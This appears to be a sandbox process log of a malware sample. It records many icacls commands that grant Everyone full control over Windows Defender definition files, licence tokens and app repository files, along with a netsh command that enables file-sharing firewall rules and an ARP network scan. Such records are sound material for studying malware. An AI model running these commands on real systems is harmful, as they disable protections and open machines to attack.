C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\266D1CA4-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1280_0720_notdimmed.jpg /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\109c9870-7988-c77e-8ad0-376ab6e81351.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28748306-9f02-a5d7-6ded-4459fddadc31.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2a3adcd0-4ddc-f3d2-6bcb-f11f9cbc1e2c.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3c8c7eb3-7a1d-7981-0472-571cdd1d1292.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3ebdb897-991b-934f-ee13-2ca21ed81938.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\3f586f55-284b-e455-06b2-84c84e8d0d2d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\41b63f44-ec3b-79f7-4657-c8f0727d1b13.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\4c4ecbc0-0ec0-3929-aebb-a931a339fb23.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\517cfcaf-138b-1796-2cea-62892204250a.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\5b0a39aa-16e0-a938-f694-656664c7be15.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\600364a7-e11c-efda-2c12-eac40e75f19a.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\61b5bd89-4cb0-db77-6622-cb63b5a58080.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\630a70e7-1832-4f42-e2a2-5d35fdddc45f.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\67447b0c-05cf-6740-5f7b-391ab440c42d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\6e90ed81-9187-fa62-ce90-f18d7bed6b12.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71c8f37a-a7b9-aff0-6de0-9b276c089ad6.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\71ef3df1-f4b1-69cd-793a-48e165e282aa.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7309084a-bb6f-20c3-ea54-aa108ceab1ae.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\7646fa0f-b52c-71a8-3aed-950dd1668c09.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8292682a-6850-c06c-9b6d-9646f16d4ed0.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\865e8f30-20a1-9528-bb48-42999b5b2aa8.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8ce3d3dd-a4c7-6c38-5fde-1f9f5df98807.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8d56e57b-8663-136d-ff69-a004e217825a.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\8e383e90-b2f9-7bf2-1d5b-4e47dcb2014e.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\9d3ad23c-c6b8-7fb5-e4ab-f5d0a66dcfbc.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a1e5b165-0532-a6a3-f542-0c5c162be3e1.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\a7e08b8b-ad4b-af00-ebcc-1aa29a833ce9.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ac116a72-b6b1-d558-23f6-10796e634d41.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b34b197c-c0ed-bf12-c9bb-44e883c66a9d.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\b81d7e70-84e7-b16a-e3d0-1e7aa2f1232d.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbc7a1c3-44c6-27b6-1e16-487a47263f3e.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bbfbe8ad-1a35-a7f3-33bc-40912bf89dfb.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\bcda97bb-bfd0-2a72-3c90-c8518f3d09ee.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c3d42a1a-2f3f-a4a9-6a04-cc1b234485fb.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\c94a6c18-d496-da1c-8a02-fc6976e0145e.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ca947da2-7e9a-7249-8095-bceb379c6f74.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\cb692946-a9f3-639d-1064-a6d75a01b9c3.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d1ecfce2-f845-c1e9-052b-d2f457c135e6.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d508ba05-d8aa-2836-484d-3833d22fe185.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\d90ad1eb-bec3-18c1-8c97-eef683ba6a1f.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e2a686b1-b02a-b3e7-90cb-3fa0d708ce04.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e335baf1-18ab-73fe-e089-3fa0a6e71a35.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e64ffef1-e246-b632-595b-56076a3fa776.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8ac9388-7c9c-19cc-fd4d-cb72bb1544ea.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\e8fff2df-6041-8f21-3df7-db31661aa09b.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\ecbc2601-0a67-4963-e594-43c65d6ec9a5.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\eee47229-947d-2ac7-e8a3-49bafee251d1.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q3⤵
-
